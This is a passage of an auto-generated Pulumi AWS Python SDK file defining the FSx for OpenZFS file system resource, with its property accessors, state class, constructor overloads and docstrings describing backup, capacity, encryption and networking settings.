@daily_automatic_backup_start_time.setter
def daily_automatic_backup_start_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "daily_automatic_backup_start_time", value)
@property
@pulumi.getter(name="diskIopsConfiguration")
def disk_iops_configuration(self) -> Optional[pulumi.Input['OpenZfsFileSystemDiskIopsConfigurationArgs']]:
"""
The SSD IOPS configuration for the Amazon FSx for OpenZFS file system. See Disk Iops Configuration Below.
"""
return pulumi.get(self, "disk_iops_configuration")
@disk_iops_configuration.setter
def disk_iops_configuration(self, value: Optional[pulumi.Input['OpenZfsFileSystemDiskIopsConfigurationArgs']]):
pulumi.set(self, "disk_iops_configuration", value)
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[pulumi.Input[str]]:
"""
ARN for the KMS Key to encrypt the file system at rest, Defaults to an AWS managed KMS Key.
"""
return pulumi.get(self, "kms_key_id")
@kms_key_id.setter
def kms_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_id", value)
@property
@pulumi.getter(name="rootVolumeConfiguration")
def root_volume_configuration(self) -> Optional[pulumi.Input['OpenZfsFileSystemRootVolumeConfigurationArgs']]:
"""
The configuration for the root volume of the file system. All other volumes are children or the root volume. See Root Volume Configuration Below.
"""
return pulumi.get(self, "root_volume_configuration")
@root_volume_configuration.setter
def root_volume_configuration(self, value: Optional[pulumi.Input['OpenZfsFileSystemRootVolumeConfigurationArgs']]):
pulumi.set(self, "root_volume_configuration", value)
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of IDs for the security groups that apply to the specified network interfaces created for file system access. These security groups will apply to all network interfaces.
"""
return pulumi.get(self, "security_group_ids")
@security_group_ids.setter
def security_group_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "security_group_ids", value)
@property
@pulumi.getter(name="storageCapacity")
def storage_capacity(self) -> Optional[pulumi.Input[int]]:
"""
The storage capacity (GiB) of the file system. Valid values between `64` and `524288`.
"""
return pulumi.get(self, "storage_capacity")
@storage_capacity.setter
def storage_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "storage_capacity", value)
@property
@pulumi.getter(name="storageType")
def storage_type(self) -> Optional[pulumi.Input[str]]:
"""
The filesystem storage type. Only `SSD` is supported.
"""
return pulumi.get(self, "storage_type")
@storage_type.setter
def storage_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "storage_type", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags to assign to the file system. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
@property
@pulumi.getter(name="weeklyMaintenanceStartTime")
def weekly_maintenance_start_time(self) -> Optional[pulumi.Input[str]]:
"""
The preferred start time (in `d:HH:MM` format) to perform weekly maintenance, in the UTC time zone.
"""
return pulumi.get(self, "weekly_maintenance_start_time")
@weekly_maintenance_start_time.setter
def weekly_maintenance_start_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "weekly_maintenance_start_time", value)
@pulumi.input_type
class _OpenZfsFileSystemState:
def __init__(__self__, *,
arn: Optional[pulumi.Input[str]] = None,
automatic_backup_retention_days: Optional[pulumi.Input[int]] = None,
backup_id: Optional[pulumi.Input[str]] = None,
copy_tags_to_backups: Optional[pulumi.Input[bool]] = None,
copy_tags_to_volumes: Optional[pulumi.Input[bool]] = None,
daily_automatic_backup_start_time: Optional[pulumi.Input[str]] = None,
deployment_type: Optional[pulumi.Input[str]] = None,
disk_iops_configuration: Optional[pulumi.Input['OpenZfsFileSystemDiskIopsConfigurationArgs']] = None,
dns_name: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
network_interface_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
owner_id: Optional[pulumi.Input[str]] = None,
root_volume_configuration: Optional[pulumi.Input['OpenZfsFileSystemRootVolumeConfigurationArgs']] = None,
root_volume_id: Optional[pulumi.Input[str]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
storage_capacity: Optional[pulumi.Input[int]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
subnet_ids: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throughput_capacity: Optional[pulumi.Input[int]] = None,
vpc_id: Optional[pulumi.Input[str]] = None,
weekly_maintenance_start_time: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering OpenZfsFileSystem resources.
:param pulumi.Input[str] arn: Amazon Resource Name of the file system.
:param pulumi.Input[int] automatic_backup_retention_days: The number of days to retain automatic backups. Setting this to 0 disables automatic backups. You can retain automatic backups for a maximum of 90 days.
:param pulumi.Input[str] backup_id: The ID of the source backup to create the filesystem from.
:param pulumi.Input[bool] copy_tags_to_backups: A boolean flag indicating whether tags for the file system should be copied to backups. The default value is false.
:param pulumi.Input[bool] copy_tags_to_volumes: A boolean flag indicating whether tags for the file system should be copied to snapshots. The default value is false.
:param pulumi.Input[str] daily_automatic_backup_start_time: A recurring daily time, in the format HH:MM. HH is the zero-padded hour of the day (0-23), and MM is the zero-padded minute of the hour. For example, 05:00 specifies 5 AM daily. Requires `automatic_backup_retention_days` to be set.
:param pulumi.Input[str] deployment_type: - The filesystem deployment type. Only `SINGLE_AZ_1` is supported.
:param pulumi.Input['OpenZfsFileSystemDiskIopsConfigurationArgs'] disk_iops_configuration: The SSD IOPS configuration for the Amazon FSx for OpenZFS file system. See Disk Iops Configuration Below.
:param pulumi.Input[str] dns_name: DNS name for the file system, e.g., `fs-12345678.fsx.us-west-2.amazonaws.com`
:param pulumi.Input[str] kms_key_id: ARN for the KMS Key to encrypt the file system at rest, Defaults to an AWS managed KMS Key.
:param pulumi.Input[Sequence[pulumi.Input[str]]] network_interface_ids: Set of Elastic Network Interface identifiers from which the file system is accessible The first network interface returned is the primary network interface.
:param pulumi.Input[str] owner_id: AWS account identifier that created the file system.
:param pulumi.Input['OpenZfsFileSystemRootVolumeConfigurationArgs'] root_volume_configuration: The configuration for the root volume of the file system. All other volumes are children or the root volume. See Root Volume Configuration Below.
:param pulumi.Input[str] root_volume_id: Identifier of the root volume, e.g., `fsvol-12345678`
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A list of IDs for the security groups that apply to the specified network interfaces created for file system access. These security groups will apply to all network interfaces.
:param pulumi.Input[int] storage_capacity: The storage capacity (GiB) of the file system. Valid values between `64` and `524288`.
:param pulumi.Input[str] storage_type: The filesystem storage type. Only `SSD` is supported.
:param pulumi.Input[str] subnet_ids: A list of IDs for the subnets that the file system will be accessible from. Exactly 1 subnet need to be provided.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the file system. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
:param pulumi.Input[int] throughput_capacity: Throughput (megabytes per second) of the file system in power of 2 increments. Minimum of `64` and maximum of `4096`.
:param pulumi.Input[str] vpc_id: Identifier of the Virtual Private Cloud for the file system.
:param pulumi.Input[str] weekly_maintenance_start_time: The preferred start time (in `d:HH:MM` format) to perform weekly maintenance, in the UTC time zone.
"""
if arn is not None:
pulumi.set(__self__, "arn", arn)
if automatic_backup_retention_days is not None:
pulumi.set(__self__, "automatic_backup_retention_days", automatic_backup_retention_days)
if backup_id is not None:
pulumi.set(__self__, "backup_id", backup_id)
if copy_tags_to_backups is not None:
pulumi.set(__self__, "copy_tags_to_backups", copy_tags_to_backups)
if copy_tags_to_volumes is not None:
pulumi.set(__self__, "copy_tags_to_volumes", copy_tags_to_volumes)
if daily_automatic_backup_start_time is not None:
pulumi.set(__self__, "daily_automatic_backup_start_time", daily_automatic_backup_start_time)
if deployment_type is not None:
pulumi.set(__self__, "deployment_type", deployment_type)
if disk_iops_configuration is not None:
pulumi.set(__self__, "disk_iops_configuration", disk_iops_configuration)
if dns_name is not None:
pulumi.set(__self__, "dns_name", dns_name)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if network_interface_ids is not None:
pulumi.set(__self__, "network_interface_ids", network_interface_ids)
if owner_id is not None:
pulumi.set(__self__, "owner_id", owner_id)
if root_volume_configuration is not None:
pulumi.set(__self__, "root_volume_configuration", root_volume_configuration)
if root_volume_id is not None:
pulumi.set(__self__, "root_volume_id", root_volume_id)
if security_group_ids is not None:
pulumi.set(__self__, "security_group_ids", security_group_ids)
if storage_capacity is not None:
pulumi.set(__self__, "storage_capacity", storage_capacity)
if storage_type is not None:
pulumi.set(__self__, "storage_type", storage_type)
if subnet_ids is not None:
pulumi.set(__self__, "subnet_ids", subnet_ids)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
if throughput_capacity is not None:
pulumi.set(__self__, "throughput_capacity", throughput_capacity)
if vpc_id is not None:
pulumi.set(__self__, "vpc_id", vpc_id)
if weekly_maintenance_start_time is not None:
pulumi.set(__self__, "weekly_maintenance_start_time", weekly_maintenance_start_time)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
Amazon Resource Name of the file system.
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter(name="automaticBackupRetentionDays")
def automatic_backup_retention_days(self) -> Optional[pulumi.Input[int]]:
"""
The number of days to retain automatic backups. Setting this to 0 disables automatic backups. You can retain automatic backups for a maximum of 90 days.
"""
return pulumi.get(self, "automatic_backup_retention_days")
@automatic_backup_retention_days.setter
def automatic_backup_retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "automatic_backup_retention_days", value)
@property
@pulumi.getter(name="backupId")
def backup_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the source backup to create the filesystem from.
"""
return pulumi.get(self, "backup_id")
@backup_id.setter
def backup_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "backup_id", value)
@property
@pulumi.getter(name="copyTagsToBackups")
def copy_tags_to_backups(self) -> Optional[pulumi.Input[bool]]:
"""
A boolean flag indicating whether tags for the file system should be copied to backups. The default value is false.
"""
return pulumi.get(self, "copy_tags_to_backups")
@copy_tags_to_backups.setter
def copy_tags_to_backups(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "copy_tags_to_backups", value)
@property
@pulumi.getter(name="copyTagsToVolumes")
def copy_tags_to_volumes(self) -> Optional[pulumi.Input[bool]]:
"""
A boolean flag indicating whether tags for the file system should be copied to snapshots. The default value is false.
"""
return pulumi.get(self, "copy_tags_to_volumes")
@copy_tags_to_volumes.setter
def copy_tags_to_volumes(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "copy_tags_to_volumes", value)
@property
@pulumi.getter(name="dailyAutomaticBackupStartTime")
def daily_automatic_backup_start_time(self) -> Optional[pulumi.Input[str]]:
"""
A recurring daily time, in the format HH:MM. HH is the zero-padded hour of the day (0-23), and MM is the zero-padded minute of the hour. For example, 05:00 specifies 5 AM daily. Requires `automatic_backup_retention_days` to be set.
"""
return pulumi.get(self, "daily_automatic_backup_start_time")
@daily_automatic_backup_start_time.setter
def daily_automatic_backup_start_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "daily_automatic_backup_start_time", value)
@property
@pulumi.getter(name="deploymentType")
def deployment_type(self) -> Optional[pulumi.Input[str]]:
"""
- The filesystem deployment type. Only `SINGLE_AZ_1` is supported.
"""
return pulumi.get(self, "deployment_type")
@deployment_type.setter
def deployment_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deployment_type", value)
@property
@pulumi.getter(name="diskIopsConfiguration")
def disk_iops_configuration(self) -> Optional[pulumi.Input['OpenZfsFileSystemDiskIopsConfigurationArgs']]:
"""
The SSD IOPS configuration for the Amazon FSx for OpenZFS file system. See Disk Iops Configuration Below.
"""
return pulumi.get(self, "disk_iops_configuration")
@disk_iops_configuration.setter
def disk_iops_configuration(self, value: Optional[pulumi.Input['OpenZfsFileSystemDiskIopsConfigurationArgs']]):
pulumi.set(self, "disk_iops_configuration", value)
@property
@pulumi.getter(name="dnsName")
def dns_name(self) -> Optional[pulumi.Input[str]]:
"""
DNS name for the file system, e.g., `fs-12345678.fsx.us-west-2.amazonaws.com`
"""
return pulumi.get(self, "dns_name")
@dns_name.setter
def dns_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "dns_name", value)
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[pulumi.Input[str]]:
"""
ARN for the KMS Key to encrypt the file system at rest, Defaults to an AWS managed KMS Key.
"""
return pulumi.get(self, "kms_key_id")
@kms_key_id.setter
def kms_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_id", value)
@property
@pulumi.getter(name="networkInterfaceIds")
def network_interface_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Set of Elastic Network Interface identifiers from which the file system is accessible The first network interface returned is the primary network interface.
"""
return pulumi.get(self, "network_interface_ids")
@network_interface_ids.setter
def network_interface_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "network_interface_ids", value)
@property
@pulumi.getter(name="ownerId")
def owner_id(self) -> Optional[pulumi.Input[str]]:
"""
AWS account identifier that created the file system.
"""
return pulumi.get(self, "owner_id")
@owner_id.setter
def owner_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "owner_id", value)
@property
@pulumi.getter(name="rootVolumeConfiguration")
def root_volume_configuration(self) -> Optional[pulumi.Input['OpenZfsFileSystemRootVolumeConfigurationArgs']]:
"""
The configuration for the root volume of the file system. All other volumes are children or the root volume. See Root Volume Configuration Below.
"""
return pulumi.get(self, "root_volume_configuration")
@root_volume_configuration.setter
def root_volume_configuration(self, value: Optional[pulumi.Input['OpenZfsFileSystemRootVolumeConfigurationArgs']]):
pulumi.set(self, "root_volume_configuration", value)
@property
@pulumi.getter(name="rootVolumeId")
def root_volume_id(self) -> Optional[pulumi.Input[str]]:
"""
Identifier of the root volume, e.g., `fsvol-12345678`
"""
return pulumi.get(self, "root_volume_id")
@root_volume_id.setter
def root_volume_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "root_volume_id", value)
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of IDs for the security groups that apply to the specified network interfaces created for file system access. These security groups will apply to all network interfaces.
"""
return pulumi.get(self, "security_group_ids")
@security_group_ids.setter
def security_group_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "security_group_ids", value)
@property
@pulumi.getter(name="storageCapacity")
def storage_capacity(self) -> Optional[pulumi.Input[int]]:
"""
The storage capacity (GiB) of the file system. Valid values between `64` and `524288`.
"""
return pulumi.get(self, "storage_capacity")
@storage_capacity.setter
def storage_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "storage_capacity", value)
@property
@pulumi.getter(name="storageType")
def storage_type(self) -> Optional[pulumi.Input[str]]:
"""
The filesystem storage type. Only `SSD` is supported.
"""
return pulumi.get(self, "storage_type")
@storage_type.setter
def storage_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "storage_type", value)
@property
@pulumi.getter(name="subnetIds")
def subnet_ids(self) -> Optional[pulumi.Input[str]]:
"""
A list of IDs for the subnets that the file system will be accessible from. Exactly 1 subnet need to be provided.
"""
return pulumi.get(self, "subnet_ids")
@subnet_ids.setter
def subnet_ids(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_ids", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags to assign to the file system. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
@property
@pulumi.getter(name="throughputCapacity")
def throughput_capacity(self) -> Optional[pulumi.Input[int]]:
"""
Throughput (megabytes per second) of the file system in power of 2 increments. Minimum of `64` and maximum of `4096`.
"""
return pulumi.get(self, "throughput_capacity")
@throughput_capacity.setter
def throughput_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "throughput_capacity", value)
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> Optional[pulumi.Input[str]]:
"""
Identifier of the Virtual Private Cloud for the file system.
"""
return pulumi.get(self, "vpc_id")
@vpc_id.setter
def vpc_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vpc_id", value)
@property
@pulumi.getter(name="weeklyMaintenanceStartTime")
def weekly_maintenance_start_time(self) -> Optional[pulumi.Input[str]]:
"""
The preferred start time (in `d:HH:MM` format) to perform weekly maintenance, in the UTC time zone.
"""
return pulumi.get(self, "weekly_maintenance_start_time")
@weekly_maintenance_start_time.setter
def weekly_maintenance_start_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "weekly_maintenance_start_time", value)
class OpenZfsFileSystem(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
automatic_backup_retention_days: Optional[pulumi.Input[int]] = None,
backup_id: Optional[pulumi.Input[str]] = None,
copy_tags_to_backups: Optional[pulumi.Input[bool]] = None,
copy_tags_to_volumes: Optional[pulumi.Input[bool]] = None,
daily_automatic_backup_start_time: Optional[pulumi.Input[str]] = None,
deployment_type: Optional[pulumi.Input[str]] = None,
disk_iops_configuration: Optional[pulumi.Input[pulumi.InputType['OpenZfsFileSystemDiskIopsConfigurationArgs']]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
root_volume_configuration: Optional[pulumi.Input[pulumi.InputType['OpenZfsFileSystemRootVolumeConfigurationArgs']]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
storage_capacity: Optional[pulumi.Input[int]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
subnet_ids: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throughput_capacity: Optional[pulumi.Input[int]] = None,
weekly_maintenance_start_time: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages an Amazon FSx for OpenZFS file system.
See the [FSx OpenZFS User Guide](https://docs.aws.amazon.com/fsx/latest/OpenZFSGuide/what-is-fsx.html) for more information.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
test = aws.fsx.OpenZfsFileSystem("test",
storage_capacity=64,
subnet_ids=[aws_subnet["test1"]["id"]],
deployment_type="SINGLE_AZ_1",
throughput_capacity=64)
```
## Import
FSx File Systems can be imported using the `id`, e.g.,
```sh
$ pulumi import aws:fsx/openZfsFileSystem:OpenZfsFileSystem example fs-543ab12b1ca672f33
```
Certain resource arguments, like `security_group_ids`, do not have a FSx API method for reading the information after creation. If the argument is set in the Terraform configuration on an imported resource, Terraform will always show a difference. To workaround this behavior, either omit the argument from the Terraform configuration or use [`ignore_changes`](https://www.terraform.io/docs/configuration/meta-arguments/lifecycle.html#ignore_changes) to hide the difference, e.g., terraform resource "aws_fsx_openzfs_file_system" "example" {
# ... other configuration ...
security_group_ids = [aws_security_group.example.id]
# There is no FSx API for reading security_group_ids
lifecycle {
ignore_changes = [security_group_ids]
} }
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] automatic_backup_retention_days: The number of days to retain automatic backups. Setting this to 0 disables automatic backups. You can retain automatic backups for a maximum of 90 days.
:param pulumi.Input[str] backup_id: The ID of the source backup to create the filesystem from.
:param pulumi.Input[bool] copy_tags_to_backups: A boolean flag indicating whether tags for the file system should be copied to backups. The default value is false.
:param pulumi.Input[bool] copy_tags_to_volumes: A boolean flag indicating whether tags for the file system should be copied to snapshots. The default value is false.
:param pulumi.Input[str] daily_automatic_backup_start_time: A recurring daily time, in the format HH:MM. HH is the zero-padded hour of the day (0-23), and MM is the zero-padded minute of the hour. For example, 05:00 specifies 5 AM daily. Requires `automatic_backup_retention_days` to be set.
:param pulumi.Input[str] deployment_type: - The filesystem deployment type. Only `SINGLE_AZ_1` is supported.
:param pulumi.Input[pulumi.InputType['OpenZfsFileSystemDiskIopsConfigurationArgs']] disk_iops_configuration: The SSD IOPS configuration for the Amazon FSx for OpenZFS file system. See Disk Iops Configuration Below.
:param pulumi.Input[str] kms_key_id: ARN for the KMS Key to encrypt the file system at rest, Defaults to an AWS managed KMS Key.
:param pulumi.Input[pulumi.InputType['OpenZfsFileSystemRootVolumeConfigurationArgs']] root_volume_configuration: The configuration for the root volume of the file system. All other volumes are children or the root volume. See Root Volume Configuration Below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A list of IDs for the security groups that apply to the specified network interfaces created for file system access. These security groups will apply to all network interfaces.
:param pulumi.Input[int] storage_capacity: The storage capacity (GiB) of the file system. Valid values between `64` and `524288`.
:param pulumi.Input[str] storage_type: The filesystem storage type. Only `SSD` is supported.
:param pulumi.Input[str] subnet_ids: A list of IDs for the subnets that the file system will be accessible from. Exactly 1 subnet need to be provided.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the file system. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
:param pulumi.Input[int] throughput_capacity: Throughput (megabytes per second) of the file system in power of 2 increments. Minimum of `64` and maximum of `4096`.
:param pulumi.Input[str] weekly_maintenance_start_time: The preferred start time (in `d:HH:MM` format) to perform weekly maintenance, in the UTC time zone.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: OpenZfsFileSystemArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an Amazon FSx for OpenZFS file system.
See the [FSx OpenZFS User Guide](https://docs.aws.amazon.com/fsx/latest/OpenZFSGuide/what-is-fsx.html) for more information.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
test = aws.fsx.OpenZfsFileSystem("test",
storage_capacity=64,
subnet_ids=[aws_subnet["test1"]["id"]],
deployment_type="SINGLE_AZ_1",
throughput_capacity=64)
```
## Import
FSx File Systems can be imported using the `id`, e.g.,
```sh
$ pulumi import aws:fsx/openZfsFileSystem:OpenZfsFileSystem example fs-543ab12b1ca672f33
```
Certain resource arguments, like `security_group_ids`, do not have a FSx API method for reading the information after creation. If the argument is set in the Terraform configuration on an imported resource, Terraform will always show a difference. To workaround this behavior, either omit the argument from the Terraform configuration or use [`ignore_changes`](https://www.terraform.io/docs/configuration/meta-arguments/lifecycle.html#ignore_changes) to hide the difference, e.g., terraform resource "aws_fsx_openzfs_file_system" "example" {
# ... other configuration ...
security_group_ids = [aws_security_group.example.id]
# There is no FSx API for reading security_group_ids
lifecycle {
ignore_changes = [security_group_ids]
} }
:param str resource_name: The name of the resource.
:param OpenZfsFileSystemArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(OpenZfsFileSystemArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
automatic_backup_retention_days: Optional[pulumi.Input[int]] = None,
backup_id: Optional[pulumi.Input[str]] = None,
copy_tags_to_backups: Optional[pulumi.Input[bool]] = None,
copy_tags_to_volumes: Optional[pulumi.Input[bool]] = None,
daily_automatic_backup_start_time: Optional[pulumi.Input[str]] = None,
deployment_type: Optional[pulumi.Input[str]] = None,
disk_iops_configuration: Optional[pulumi.Input[pulumi.InputType['OpenZfsFileSystemDiskIopsConfigurationArgs']]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
root_volume_configuration: Optional[pulumi.Input[pulumi.InputType['OpenZfsFileSystemRootVolumeConfigurationArgs']]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
storage_capacity: Optional[pulumi.Input[int]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
subnet_ids: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throughput_capacity: Optional[pulumi.Input[int]] = None,
weekly_maintenance_start_time: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = OpenZfsFileSystemArgs.__new__(OpenZfsFileSystemArgs)
__props__.__dict__["automatic_backup_retention_days"] = automatic_backup_retention_days
__props__.__dict__["backup_id"] = backup_id
__props__.__dict__["copy_tags_to_backups"] = copy_tags_to_backups
__props__.__dict__["copy_tags_to_volumes"] = copy_tags_to_volumes
__props__.__dict__["daily_automatic_backup_start_time"] = daily_automatic_backup_start_time
if deployment_type is None and not opts.urn:
raise TypeError("Missing required property 'deployment_type'")
__props__.__dict__["deployment_type"] = deployment_type
__props__.__dict__["disk_iops_configuration"] = disk_iops_configuration
__props__.__dict__["kms_key_id"] = kms_key_id
__props__.__dict__["root_volume_configuration"] = root_volume_configuration
__props__.__dict__["security_group_ids"] = security_group_ids
__props__.__dict__["storage_capacity"] = storage_capacity
__props__.__dict__["storage_type"] = storage_type
if subnet_ids is None and not opts.urn:
raise TypeError("Missing required property 'subnet_ids'")
__props__.__dict__["subnet_ids"] = subnet_ids
__props__.__dict__["tags"] = tags
__props__.__dict__["tags_all"] = tags_all
if throughput_capacity is None and not opts.urn:
raise TypeError("Missing required property 'throughput_capacity'")
__props__.__dict__["throughput_capacity"] = throughput_capacity
__props__.__dict__["weekly_maintenance_start_time"] = weekly_maintenance_start_time
__props__.__dict__["arn"] = None
__props__.__dict__["dns_name"] = None
__props__.__dict__["network_interface_ids"] = None
__props__.__dict__["owner_id"] = None
__props__.__dict__["root_volume_id"] = None
__props__.__dict__["vpc_id"] = None
super(OpenZfsFileSystem, __self__).__init__(
'aws:fsx/openZfsFileSystem:OpenZfsFileSystem',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
arn: Optional[pulumi.Input[str]] = None,
automatic_backup_retention_days: Optional[pulumi.Input[int]] = None,
backup_id: Optional[pulumi.Input[str]] = None,
copy_tags_to_backups: Optional[pulumi.Input[bool]] = None,
copy_tags_to_volumes: Optional[pulumi.Input[bool]] = None,
daily_automatic_backup_start_time: Optional[pulumi.Input[str]] = None,
deployment_type: Optional[pulumi.Input[str]] = None,
disk_iops_configuration: Optional[pulumi.Input[pulumi.InputType['OpenZfsFileSystemDiskIopsConfigurationArgs']]] = None,
dns_name: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
network_interface_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
owner_id: Optional[pulumi.Input[str]] = None,
root_volume_configuration: Optional[pulumi.Input[pulumi.InputType['OpenZfsFileSystemRootVolumeConfigurationArgs']]] = None,
root_volume_id: Optional[pulumi.Input[str]] = None,
